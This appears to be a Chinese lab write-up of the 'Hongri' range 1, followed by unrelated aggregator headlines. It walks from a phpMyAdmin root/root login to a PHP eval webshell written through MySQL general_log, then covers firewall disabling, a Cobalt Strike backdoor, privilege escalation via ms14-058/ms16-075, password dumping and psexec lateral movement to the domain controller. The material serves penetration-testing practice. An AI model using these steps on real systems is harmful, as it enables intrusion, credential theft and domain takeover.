红日靶场1渗透
环境配置给win2008、win2003和win7配置一个192.168.52.0网段的网卡win7额外配置一个网卡充当外网网卡这里nat是外网网卡vmnet1是内网网卡然后登录win7密码是hongrisec2019登陆后提示密码过期随便改一个密码比如admin123本地连接5是内网的网卡在控制面版找到网络连接将首选dns改为192.168.52.138IP地址如果不是对应外网网卡的网段可以手动配置。我的nat网段是192.168.14.0我这里最开始没有自动分配192.168.14.0网段所以选择手动配置执行net group domain controllers /domain看看能不能向域控请求如果出现发生系统错误5 。拒绝访问那就重装win7完成之后打开c盘的phpstudy环境搭建完毕外网渗透目录扫描开启80和3306远程连接3306连接不上对http页面扫描目录发现了phpmyadmi使用弱口令root/root登录写入一句话木马root权限登录看看能不能直接写一个一句话木马SHOW VARIABLES LIKE secure_file_priv;不能直接写入文件使用日志功能getshell查看是否开启日志show variables like general_log;开启日志set global general_logon;再次查看是否开启查看日志保存位置show variables like general_log_file;修改日志保存位置为WWW目录下set global general_log_fileC:\\phpStudy\\WWW\\mm.php;查看日志输出类型show variables like log_output;此时再执行select ?php eval($_POST[cmd]);?;即可将一句话木马写入使用蚁剑连接内网渗透内网信息收集参看当前用户查看有无杀软https://www.ddosi.org/av/tasklist /svc关闭防火墙netsh advfirewall set allprofiles state off上传cs后门程序上线cs查看网络信息ipconfig /all查看域net view /domain查看系统信息systeminfo查看域控机器名net group domain controllers /domain查看当前机器与其他机器通信情况arp -a至此可以知道域控IP是192.168.52.138域控机器名是OWA并且当前用户是在域内的只加入了一个域除了域控和本机还有一个192.168.52.141。最重要的是用户权限是域管权限接下来查看域管理员成员net group Domain Admins /domain查看本地管理员组net localgroup administrators已经是域管了不用考虑其他用户了域管默认可以连接ipc查看域控ipc共享文件net view \\192.168.52.138查看当前会话qwinsta /server:localhost权限提升接下来提权抓取密码根据前面systeminfo去查找提权exp可以找到很多提权漏洞使用ms14-058、ms16-075都可以提权横向移动使用插件抓取密码可以直接获取明文密码接下来使用psexec横向移动因为内网的机器不能出网需要通过入口机上线cs这里可以在cs中选择代理转发中的转发上线监听主机选择跳板机与域控通信的内网IP打开监听器可以看到多了一个监听在横向前需要在cs上扫描内网机器选择网络探测此时点击小电脑就可以看到扫描的结果域内几台机器右键选择横向移动、psexec将获得的信息填入监听选择跳板windows_dc等待一会就可以上线域控同样方法选择另一台机器机器成功上线

相关新闻

ssm基于java的课堂教学效果实时评价系统(源码+文档+调试+vue+前后端分离)

ssm基于java的课堂教学效果实时评价系统(源码+文档+调试+vue+前后端分离)

前言 首先,论文一开始便是清楚的论述了系统的研究内容。其次,剖析系统需求分析,弄明白“做什么”,分析包括业务分析、业务流程的分析、用例分析,更进一步明确系统的需求。然后在明白了系统的需求基础上需要进一步地设计系统,主要包罗软件架构 模式、整体功能模块、数据库设计。…

2026/7/3 19:16:26 阅读更多 →
C语言数据类型与常量变量

C语言数据类型与常量变量

C语言数据类型与常量变量:构建程序的基础材料 一、数据类型概述 C语言是一种强类型语言,这意味着所有的数据都必须具有某种数据类型,并且在使用前必须先声明。C语言提供了丰富的数据类型,可以分为以下几大类:类别说明基…

2026/5/17 10:21:03 阅读更多 →
(103页PPT)IBMmairui集成供应链优化业务变革咨询方案建议书(附下载方式)

(103页PPT)IBMmairui集成供应链优化业务变革咨询方案建议书(附下载方式)

篇幅所限,本文只提供部分资料内容,完整资料请看下面链接 (103页PPT)IBMmairui集成供应链优化业务变革咨询方案建议书.pptx_电力物联网服务平台设计资源-CSDN下载 资料解读:IBMmairui 集成供应链优化业务变革咨询方案建…

2026/7/2 23:47:05 阅读更多 →

最新新闻

YOLOv8中GAM注意力机制的实现与优化

YOLOv8中GAM注意力机制的实现与优化

1. GAM注意力机制的技术背景与核心价值 在目标检测领域,YOLOv8作为当前最先进的实时检测框架,其性能提升一直备受关注。传统卷积神经网络在处理特征图时存在一个根本性局限:所有空间位置和通道维度都被平等对待,而实际上不同区域和…

2026/7/4 10:40:19 阅读更多 →
基于YOLOv8的红外光伏板缺陷检测系统设计与实现

基于YOLOv8的红外光伏板缺陷检测系统设计与实现

1. 项目概述:基于YOLOv8的红外光伏板缺陷检测系统光伏板作为清洁能源的核心组件,其表面缺陷会直接影响发电效率。传统人工检测方式效率低下且容易漏检,我们团队开发的这套系统采用YOLOv8目标检测算法,实现了对光伏板缺陷的自动化识…

2026/7/4 10:40:19 阅读更多 →
从AI小白到高效协作者:普通人快速上手的实战指南

从AI小白到高效协作者:普通人快速上手的实战指南

1. 项目概述:为什么“ALL IN AI”不再是口号最近和不少朋友聊天,发现一个挺有意思的现象:前两年大家聊起AI,还觉得是硅谷大厂和顶尖实验室的“神仙打架”,离自己很远。但今年,从写周报、做PPT,到…

2026/7/4 10:38:18 阅读更多 →
13DOF传感器与MKV46F128VLH16微控制器的嵌入式导航方案

13DOF传感器与MKV46F128VLH16微控制器的嵌入式导航方案

1. 13DOF传感器与MKV46F128VLH16微控制器的技术背景在嵌入式定位导航领域,13DOF(13自由度)传感器组合与MKV46F128VLH16微控制器的搭配已经成为工业级应用的黄金组合。13DOF通常由三轴加速度计、三轴陀螺仪、三轴磁力计、气压计和温度传感器组…

2026/7/4 10:36:18 阅读更多 →
LLM微调实战:15家云厂商GPU性能与成本深度对比指南

LLM微调实战:15家云厂商GPU性能与成本深度对比指南

1. 项目概述:为什么这份“15家云厂商GPU大名单”值得你逐行读完 如果你正站在LLM微调或训练的起点,手头有一份高质量的领域数据集,心里盘算着“该用哪家云服务来跑通第一个LoRA实验”,那这份标题背后的内容,就是你接下…

2026/7/4 10:32:17 阅读更多 →
Windows部署OpenClaw AI智能体:安全风险与Docker容器隔离实战指南

Windows部署OpenClaw AI智能体:安全风险与Docker容器隔离实战指南

🚀 30款热门AI模型一站整合,DeepSeek/GLM/Claude 随心用,限时 5 折。 👉 点击领海量免费额度 在 Windows 环境下部署和运行开源 AI 智能体,正成为开发者探索自动化与智能化应用的新趋势。OpenClaw(常被称…

2026/7/4 10:30:16 阅读更多 →

日新闻

Memcached 1.6.43 发布:关键安全修复版本,多项问题得到解决

Memcached 1.6.43 发布:关键安全修复版本,多项问题得到解决

Memcached 1.6.43 正式发布,这是一个关键的安全修复版本,修复了多个方面的问题,还对部分功能进行了优化。 安全修复亮点 此次发布在安全修复上表现突出。binprot 避免了项目引用计数溢出,mcmc 因安全问题提升了上游版本号&#xf…

2026/7/4 0:04:29 阅读更多 →
终极指南:使用HMCL启动器跨平台畅玩Minecraft的完整解决方案

终极指南:使用HMCL启动器跨平台畅玩Minecraft的完整解决方案

终极指南:使用HMCL启动器跨平台畅玩Minecraft的完整解决方案 【免费下载链接】HMCL A Minecraft Launcher which is multi-functional, cross-platform and popular 项目地址: https://gitcode.com/gh_mirrors/hm/HMCL HMCL(Hello Minecraft! Lau…

2026/7/4 0:06:29 阅读更多 →
KMX63与PIC18F66K40在嵌入式HMI中的硬件协同与低功耗设计

KMX63与PIC18F66K40在嵌入式HMI中的硬件协同与低功耗设计

1. KMX63与PIC18F66K40的硬件协同架构解析KMX63作为一款三轴加速度计和磁力计组合传感器,与PIC18F66K40微控制器的搭配堪称嵌入式HMI开发的黄金组合。这套硬件组合的核心优势在于KMX63提供的高精度运动感知能力与PIC18F66K40强大的信号处理能力形成了完美互补。KMX6…

2026/7/4 0:06:29 阅读更多 →

周新闻

月新闻